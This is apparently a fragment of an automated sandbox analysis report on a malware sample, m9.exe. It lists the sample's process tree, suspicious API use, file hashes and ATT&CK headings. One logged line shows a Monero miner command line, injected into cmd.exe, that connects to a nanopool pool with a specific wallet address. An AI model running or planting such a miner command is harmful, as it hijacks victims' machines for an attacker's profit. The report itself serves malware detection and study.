- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4132
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:544
-
C:\Users\Admin\Desktop\m9\m9\m9.exe"C:\Users\Admin\Desktop\m9\m9\m9.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Desktop\m9\m9\m9.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892 -
C:\Windows\System32\cmd.exeC:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-west1.nanopool.org:10343 --user=44SBea2RiopNVzWLFE18jADhLfqCRJdb57n1bEPpvHbwVBvFiHdKc92JAR2JpQif11APJrz2AD5AgW83uVkNT6mn7Ru8N7V.{COMPUTERNAME} --pass= --cpu-max-threads-hint=20 --tls3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4832
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD51a545d0052b581fbb2ab4c52133846bc
SHA162f3266a9b9925cd6d98658b92adec673cbe3dd3
SHA256557472aeaebf4c1c800b9df14c190f66d62cbabb011300dbedde2dcddd27a6c1
SHA512bd326d111589d87cd6d019378ec725ac9ac7ad4c36f22453941f7d52f90b747ede4783a83dfff6cae1b3bb46690ad49cffa77f2afda019b22863ac485b406e8d
-
Filesize
4KB
MD50e8d2682332ac39677215c2036630559
SHA1bd26d6892cd17df0540305100e7aeab29c24d1bc
SHA256d536d59f7908cbbc45abc77ed59090c675c19ec7cf943bae16fb825b46e38de7
SHA512f24ccfdc6abd93f246aac4cf8c96c3562cccf69fe9c917fed5e4ec43b16480539e350c4023255da09e208858d83ae1bf7a3f7fb7d689a0219688496258614267
-
Filesize
4KB
MD5da2306b75b2f0aaf430c2772bf44ea9a
SHA1cbe04f3803c36699295b3415a3f61faa4cd3478c
SHA2566eebe71c5972ec8a118ff61e9a7251135ce99c42d721c53a377a74a11caecd6f
SHA512b6b1b5c1125072306912891b8d94df5a846513b4ff8b1269d20bc12d358aad610ac9ebf7c11e861d7adcc6142abc12c36b8b1d2cd00dadccc2f09a922dd6f40a
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee